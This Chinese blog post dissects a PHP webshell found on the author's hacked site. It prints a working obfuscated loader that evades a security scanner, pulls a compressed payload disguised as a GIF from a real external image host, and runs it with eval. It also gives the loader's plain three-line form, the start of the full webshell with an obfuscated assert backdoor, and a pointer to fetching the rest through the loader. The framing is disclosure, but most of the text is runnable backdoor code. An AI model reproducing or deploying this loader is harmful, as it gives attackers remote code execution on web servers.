PHP一句话过安全狗源码解析,PHP大马源码解析

网站被挂马了,一看还是只大马,害得我加了两宿班,木马清除,服务器重装。

下面把这只马的细节公布出来,让大家认识认识。

一句话过安全狗源文件:

<?php
$password=’password’;//登录密码(支持菜刀)
//———-功能程序——————//
$c=”chr”;
session_start();
if(empty($_SESSION[‘PhpCode’])){
$url=$c(104).$c(116).$c(116).$c(112).$c(58).$c(47);
$url.=$c(47).$c(105).$c(46).$c(110).$c(105).$c(117);
$url.=$c(112).$c(105).$c(99).$c(46).$c(99).$c(111);
$url.=$c(109).$c(47).$c(105).$c(109).$c(97).$c(103);
$url.=$c(101).$c(115).$c(47).$c(50).$c(48).$c(49).$c(55);
$url.=$c(47).$c(48).$c(53).$c(47).$c(50).$c(49).$c(47);
$url.=$c(118).$c(49).$c(81).$c(82).$c(49).$c(77).$c(46).$c(103).$c(105).$c(102);
$get=chr(102).chr(105).chr(108).chr(101).chr(95);
$get.=chr(103).chr(101).chr(116).chr(95).chr(99);
$get.=chr(111).chr(110).chr(116).chr(101).chr(110);
$get.=chr(116).chr(115);
$_SESSION[‘PhpCode’]=$get($url);}
$un=$c(103).$c(122).$c(105).$c(110);
$un.=$c(102).$c(108).$c(97).$c(116).$c(base64_decode(‘MTAx’));
@eval($un($_SESSION[‘PhpCode’]));
?>

转换为代码:

<?php
$password=’password’;//登录密码(支持菜刀)
//———-功能程序——————//

session_start();
if(empty($_SESSION[‘PhpCode’])){
$url=”http://i.niupic.com/images/2017/05/21/v1QR1M.gif”;
$get=”file_get_contents”;
$_SESSION[‘PhpCode’]=file_get_contents(“http://i.niupic.com/images/2017/05/21/v1QR1M.gif”); //$_SESSION[‘PhpCode’]=$get($url);
}
$un=”gzinflate”;
@eval(gzinflate($_SESSION[‘PhpCode’]));//@eval($un($_SESSION[‘PhpCode’]));
?>

其实说白了就三句话:
<?
$a=file_get_contents(‘http://i.niupic.com/images/2017/05/21/v1QR1M.gif’);
$b=gzinflate($a);
@eval($b);
?>

木马原理解析:
从http://i.niupic.com/images/2017/05/21/v1QR1M.gif这个地址下载大马程序,用gzinflate解压一下就得到了源代码。

全部代码如下:

define(‘myaddress’,__FILE__);
error_reporting(E_ERROR | E_PARSE);
header(“content-Type: text/html; charset=gb2312″);
@set_time_limit(0);
ob_start();
define(‘envlpass’,$password);
define(‘shellname’,$shellname);
define(‘myurl’,$myurl);
define(‘bgImg’,$bgImg);
if(@get_magic_quotes_gpc()){
foreach($_POST as $k => $v) $_POST[$k] = stripslashes($v);
foreach($_GET as $k => $v) $_GET[$k] = stripslashes($v);
}
if(isset($_REQUEST[envlpass])){
hmlogin(2);
$a = str_replace(x,””,”axsxxsxexrxxt”);$a($_REQUEST[envlpass]);
exit;}
if($_COOKIE[‘envlpass’] != md5(envlpass)){
if($_POST[‘envlpass’]){
if($_POST[‘envlpass’] == envlpass){
setcookie(‘envlpass’,md5($_POST[‘envlpass’]));
hmlogin();
}else{
echo ‘<CENTER><span id=”msg” style=”font-size:14px;font-family:隶书;color:rgb(242, 242, 242)”>用户或密码错误</span></CENTER>’;

………………

代码太长,以下省略,大家可以通过上面的源代码获取。

此条目发表在开发笔记, 网络技术分类目录,贴了, 标签。将固定链接加入收藏夹。

发表评论

电子邮件地址不会被公开。 必填项已用*标注